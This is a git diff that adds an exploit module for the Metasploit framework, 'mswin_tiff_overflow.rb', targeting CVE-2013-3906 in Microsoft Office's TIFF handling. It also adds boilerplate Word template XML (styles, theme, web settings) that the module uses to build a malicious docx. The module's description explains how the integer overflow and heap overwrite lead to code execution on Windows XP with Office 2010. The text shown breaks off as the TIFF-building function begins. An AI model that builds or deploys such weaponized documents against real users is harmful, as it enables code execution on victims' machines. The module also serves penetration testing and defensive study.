+<w:lsdException w:name="toc 8" w:uiPriority="39"/>
+<w:lsdException w:name="toc 9" w:uiPriority="39"/>
+<w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+<w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+<w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+<w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+<w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+<w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
+</w:latentStyles>
+<w:style w:type="paragraph" w:default="1" w:styleId="Normal">
+<w:name w:val="Normal"/>
+<w:qFormat/>
+<w:rsid w:val="00063BF6"/>
+</w:style>
+<w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
+<w:name w:val="Default Paragraph Font"/>
+<w:uiPriority w:val="1"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+</w:style>
+<w:style w:type="table" w:default="1" w:styleId="TableNormal">
+<w:name w:val="Normal Table"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+<w:qFormat/>
+<w:tblPr>
+<w:tblInd w:w="0" w:type="dxa"/>
+<w:tblCellMar>
+<w:top w:w="0" w:type="dxa"/>
+<w:left w:w="108" w:type="dxa"/>
+<w:bottom w:w="0" w:type="dxa"/>
+<w:right w:w="108" w:type="dxa"/>
+</w:tblCellMar>
+</w:tblPr>
+</w:style>
+<w:style w:type="numbering" w:default="1" w:styleId="NoList">
+<w:name w:val="No List"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+</w:style>
+<w:style w:type="paragraph" w:styleId="BalloonText">
+<w:name w:val="Balloon Text"/>
+<w:basedOn w:val="Normal"/>
+<w:link w:val="BalloonTextChar"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:unhideWhenUsed/>
+<w:rsid w:val="00CD271A"/>
+<w:pPr>
+<w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+</w:pPr>
+<w:rPr>
+<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+<w:sz w:val="16"/>
+<w:szCs w:val="16"/>
+</w:rPr>
+</w:style>
+<w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
+<w:name w:val="Balloon Text Char"/>
+<w:basedOn w:val="DefaultParagraphFont"/>
+<w:link w:val="BalloonText"/>
+<w:uiPriority w:val="99"/>
+<w:semiHidden/>
+<w:rsid w:val="00CD271A"/>
+<w:rPr>
+<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
+<w:sz w:val="16"/>
+<w:szCs w:val="16"/>
+</w:rPr>
+</w:style>
+</w:styles>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/theme/theme1.xml b/data/exploits/CVE-2013-3906/word/theme/theme1.xml
new file mode 100755
index 0000000000..42767537be
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/theme/theme1.xml
@@ -0,0 +1,283 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
+<a:themeElements>
+<a:clrScheme name="Office">
+<a:dk1>
+<a:sysClr val="windowText" lastClr="000000"/>
+</a:dk1>
+<a:lt1>
+<a:sysClr val="window" lastClr="FFFFFF"/>
+</a:lt1>
+<a:dk2>
+<a:srgbClr val="1F497D"/>
+</a:dk2>
+<a:lt2>
+<a:srgbClr val="EEECE1"/>
+</a:lt2>
+<a:accent1>
+<a:srgbClr val="4F81BD"/>
+</a:accent1>
+<a:accent2>
+<a:srgbClr val="C0504D"/>
+</a:accent2>
+<a:accent3>
+<a:srgbClr val="9BBB59"/>
+</a:accent3>
+<a:accent4>
+<a:srgbClr val="8064A2"/>
+</a:accent4>
+<a:accent5>
+<a:srgbClr val="4BACC6"/>
+</a:accent5>
+<a:accent6>
+<a:srgbClr val="F79646"/>
+</a:accent6>
+<a:hlink>
+<a:srgbClr val="0000FF"/>
+</a:hlink>
+<a:folHlink>
+<a:srgbClr val="800080"/>
+</a:folHlink>
+</a:clrScheme>
+<a:fontScheme name="Office">
+<a:majorFont>
+<a:latin typeface="Cambria"/>
+<a:ea typeface=""/>
+<a:cs typeface=""/>
+<a:font script="Jpan" typeface="ＭＳ ゴシック"/>
+<a:font script="Hang" typeface="맑은 고딕"/>
+<a:font script="Hans" typeface="宋体"/>
+<a:font script="Hant" typeface="新細明體"/>
+<a:font script="Arab" typeface="Times New Roman"/>
+<a:font script="Hebr" typeface="Times New Roman"/>
+<a:font script="Thai" typeface="Angsana New"/>
+<a:font script="Ethi" typeface="Nyala"/>
+<a:font script="Beng" typeface="Vrinda"/>
+<a:font script="Gujr" typeface="Shruti"/>
+<a:font script="Khmr" typeface="MoolBoran"/>
+<a:font script="Knda" typeface="Tunga"/>
+<a:font script="Guru" typeface="Raavi"/>
+<a:font script="Cans" typeface="Euphemia"/>
+<a:font script="Cher" typeface="Plantagenet Cherokee"/>
+<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+<a:font script="Tibt" typeface="Microsoft Himalaya"/>
+<a:font script="Thaa" typeface="MV Boli"/>
+<a:font script="Deva" typeface="Mangal"/>
+<a:font script="Telu" typeface="Gautami"/>
+<a:font script="Taml" typeface="Latha"/>
+<a:font script="Syrc" typeface="Estrangelo Edessa"/>
+<a:font script="Orya" typeface="Kalinga"/>
+<a:font script="Mlym" typeface="Kartika"/>
+<a:font script="Laoo" typeface="DokChampa"/>
+<a:font script="Sinh" typeface="Iskoola Pota"/>
+<a:font script="Mong" typeface="Mongolian Baiti"/>
+<a:font script="Viet" typeface="Times New Roman"/>
+<a:font script="Uigh" typeface="Microsoft Uighur"/>
+<a:font script="Geor" typeface="Sylfaen"/>
+</a:majorFont>
+<a:minorFont>
+<a:latin typeface="Calibri"/>
+<a:ea typeface=""/>
+<a:cs typeface=""/>
+<a:font script="Jpan" typeface="ＭＳ 明朝"/>
+<a:font script="Hang" typeface="맑은 고딕"/>
+<a:font script="Hans" typeface="宋体"/>
+<a:font script="Hant" typeface="新細明體"/>
+<a:font script="Arab" typeface="Arial"/>
+<a:font script="Hebr" typeface="Arial"/>
+<a:font script="Thai" typeface="Cordia New"/>
+<a:font script="Ethi" typeface="Nyala"/>
+<a:font script="Beng" typeface="Vrinda"/>
+<a:font script="Gujr" typeface="Shruti"/>
+<a:font script="Khmr" typeface="DaunPenh"/>
+<a:font script="Knda" typeface="Tunga"/>
+<a:font script="Guru" typeface="Raavi"/>
+<a:font script="Cans" typeface="Euphemia"/>
+<a:font script="Cher" typeface="Plantagenet Cherokee"/>
+<a:font script="Yiii" typeface="Microsoft Yi Baiti"/>
+<a:font script="Tibt" typeface="Microsoft Himalaya"/>
+<a:font script="Thaa" typeface="MV Boli"/>
+<a:font script="Deva" typeface="Mangal"/>
+<a:font script="Telu" typeface="Gautami"/>
+<a:font script="Taml" typeface="Latha"/>
+<a:font script="Syrc" typeface="Estrangelo Edessa"/>
+<a:font script="Orya" typeface="Kalinga"/>
+<a:font script="Mlym" typeface="Kartika"/>
+<a:font script="Laoo" typeface="DokChampa"/>
+<a:font script="Sinh" typeface="Iskoola Pota"/>
+<a:font script="Mong" typeface="Mongolian Baiti"/>
+<a:font script="Viet" typeface="Arial"/>
+<a:font script="Uigh" typeface="Microsoft Uighur"/>
+<a:font script="Geor" typeface="Sylfaen"/>
+</a:minorFont>
+</a:fontScheme>
+<a:fmtScheme name="Office">
+<a:fillStyleLst>
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:tint val="50000"/>
+<a:satMod val="300000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="35000">
+<a:schemeClr val="phClr">
+<a:tint val="37000"/>
+<a:satMod val="300000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:tint val="15000"/>
+<a:satMod val="350000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:lin ang="16200000" scaled="1"/>
+</a:gradFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:shade val="51000"/>
+<a:satMod val="130000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="80000">
+<a:schemeClr val="phClr">
+<a:shade val="93000"/>
+<a:satMod val="130000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:shade val="94000"/>
+<a:satMod val="135000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:lin ang="16200000" scaled="0"/>
+</a:gradFill>
+</a:fillStyleLst>
+<a:lnStyleLst>
+<a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+<a:solidFill>
+<a:schemeClr val="phClr">
+<a:shade val="95000"/>
+<a:satMod val="105000"/>
+</a:schemeClr>
+</a:solidFill>
+<a:prstDash val="solid"/>
+</a:ln>
+<a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:prstDash val="solid"/>
+</a:ln>
+<a:ln w="38100" cap="flat" cmpd="sng" algn="ctr">
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:prstDash val="solid"/>
+</a:ln>
+</a:lnStyleLst>
+<a:effectStyleLst>
+<a:effectStyle>
+<a:effectLst>
+<a:outerShdw blurRad="40000" dist="20000" dir="5400000" rotWithShape="0">
+<a:srgbClr val="000000">
+<a:alpha val="38000"/>
+</a:srgbClr>
+</a:outerShdw>
+</a:effectLst>
+</a:effectStyle>
+<a:effectStyle>
+<a:effectLst>
+<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
+<a:srgbClr val="000000">
+<a:alpha val="35000"/>
+</a:srgbClr>
+</a:outerShdw>
+</a:effectLst>
+</a:effectStyle>
+<a:effectStyle>
+<a:effectLst>
+<a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
+<a:srgbClr val="000000">
+<a:alpha val="35000"/>
+</a:srgbClr>
+</a:outerShdw>
+</a:effectLst>
+<a:scene3d>
+<a:camera prst="orthographicFront">
+<a:rot lat="0" lon="0" rev="0"/>
+</a:camera>
+<a:lightRig rig="threePt" dir="t">
+<a:rot lat="0" lon="0" rev="1200000"/>
+</a:lightRig>
+</a:scene3d>
+<a:sp3d>
+<a:bevelT w="63500" h="25400"/>
+</a:sp3d>
+</a:effectStyle>
+</a:effectStyleLst>
+<a:bgFillStyleLst>
+<a:solidFill>
+<a:schemeClr val="phClr"/>
+</a:solidFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:tint val="40000"/>
+<a:satMod val="350000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="40000">
+<a:schemeClr val="phClr">
+<a:tint val="45000"/>
+<a:shade val="99000"/>
+<a:satMod val="350000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:shade val="20000"/>
+<a:satMod val="255000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:path path="circle">
+<a:fillToRect l="50000" t="-80000" r="50000" b="180000"/>
+</a:path>
+</a:gradFill>
+<a:gradFill rotWithShape="1">
+<a:gsLst>
+<a:gs pos="0">
+<a:schemeClr val="phClr">
+<a:tint val="80000"/>
+<a:satMod val="300000"/>
+</a:schemeClr>
+</a:gs>
+<a:gs pos="100000">
+<a:schemeClr val="phClr">
+<a:shade val="30000"/>
+<a:satMod val="200000"/>
+</a:schemeClr>
+</a:gs>
+</a:gsLst>
+<a:path path="circle">
+<a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
+</a:path>
+</a:gradFill>
+</a:bgFillStyleLst>
+</a:fmtScheme>
+</a:themeElements>
+<a:objectDefaults/>
+<a:extraClrSchemeLst/>
+</a:theme>
\ No newline at end of file
diff --git a/data/exploits/CVE-2013-3906/word/webSettings.xml b/data/exploits/CVE-2013-3906/word/webSettings.xml
new file mode 100755
index 0000000000..c57f94f356
--- /dev/null
+++ b/data/exploits/CVE-2013-3906/word/webSettings.xml
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<w:webSettings xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
+<w:optimizeForBrowser/>
+</w:webSettings>
\ No newline at end of file
diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
new file mode 100644
index 0000000000..5b9cdb06d7
--- /dev/null
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -0,0 +1,600 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+require 'Nokogiri'
+
+module ::Nokogiri
+module XML
+  class Builder
+    #
+    # Some XML documents don't declare the namespace before referencing, but Nokogiri requires one.
+    # So here's our hack to get around that.
+    #
+    def custom_root(ns)
+      e = @parent.create_element(ns)
+      e.add_namespace_definition(ns, "href")
+      @ns = e.namespace_definitions.find { |x| x.prefix == ns.to_s }
+      return self
+    end
+  end
+end
+end
+
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Microsoft Tagged Image File Format (TIFF) Integer Overflow",
+      'Description'    => %q{
+          This module exploits a vulnerability found in Microsoft's Tagged Image File Format.
+          It was originally discovered in the wild, targeting Windows XP and Windows Server 2003
+          users running Microsoft Office, specifically in the Middle East and South Asia region.
+
+          The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a
+          drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,
+          and stored in the EAX register. The 32-bit register will run out of storage space to
+          represent the large vlaue, which ends up being 0, but it still gets pushed as a
+          dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a
+          chunk anyway with size 0, and the address of this chunk is used as the destination buffer
+          of a memcpy function, where the source buffer is the EXIF data (an extended image format
+          supported by TIFF), and is also user-controlled. A function pointer in the chunk returned
+          by HeapAlloc will end up being overwritten by the memcpy function, and then later used
+          in OGL!GdipCreatePath. By successfully controlling this function pointer, and the
+          memory layout using ActiveX, it is possible to gain arbitrary code execution under the
+          context of the user.
+
+          Please note the victim machine may experience some lag while opening the file before
+          the malicious payload is executed.
+        },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown', # Some dude wrote it and deployed in the wild
+          'sinn3r'   # Metasploit
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-3906' ],
+          [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2896666' ],
+          [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx' ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'DefaultOptions'  =>
+        {
+          'ExitFunction' => "process"
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          ['Windows XP SP3 with Office 2010', {}],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Nov 8 2013",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('FILENAME', [true, 'The docx file', 'msf.docx']),
+        ], self.class)
+  end
+
+  #
+  # Creates a TIFF that triggers the overflow
+  #
+  def make_tiff
+    # TIFF Header:
+    # TIFF ID                               = 'II' (Intel order)
+    # TIFF Version                          = 42d
+    # Offset of FID                         = 0x000049c8h
+    #
+    # Image Directory:
